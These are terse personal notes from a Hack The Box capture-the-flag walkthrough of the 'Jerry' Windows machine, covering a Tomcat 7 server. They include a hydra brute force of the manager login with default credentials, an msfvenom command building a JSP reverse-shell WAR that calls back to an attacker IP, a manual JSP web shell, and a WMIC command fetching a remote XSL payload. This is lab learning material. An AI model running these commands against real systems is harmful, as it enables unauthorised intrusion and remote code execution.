HTB Write-Up Jerry Windows
Nmap:
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
cannot login to tomcat host manager page.
look for tomcat wordlist.
Use hydra
hydra -C lets you use the colon seperated text files.
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.161.193:8000/manager/html
admin was false-positive.
got in.
the page allows you to upload a WAR file (contains javascript)
generate a payload through msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f war > shell.war
We are already root!
----
Manual JSP shell - silent trendy - python
Get a JSP shell:
Follow the instruction for host method:
<script src="http://10.10.14.131/a.js"></script>
Additional tip, remove the war file that came with the package and make your own with:
zip cmd.war cmd.jsp
it will attach the war file to the cmd.jsp
Finally, host the file on http.
Go to manager/html page/ and deploy the cmd.war file.
Now when you go to the /cmd/cmd.jsp directory, we get a shell!!!
execute command with syntax cmd /c COMMAND
Silent Trinity:
Downloaded here.
Go to server and start the st.py
do "listners" to set it as listner mode and "list" what we have
"use http" and set the BindIP
and start the listner!
Once you start do stgers > list > use wmic > generate http
Plug this value into our JSP shell.
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/wmic.xsl"
create a new www directory and move the wmic.xsl there .
Since the tomcat requires a.js file, copy that over to the directory as well.
hmm didn't work. I'll come back to this.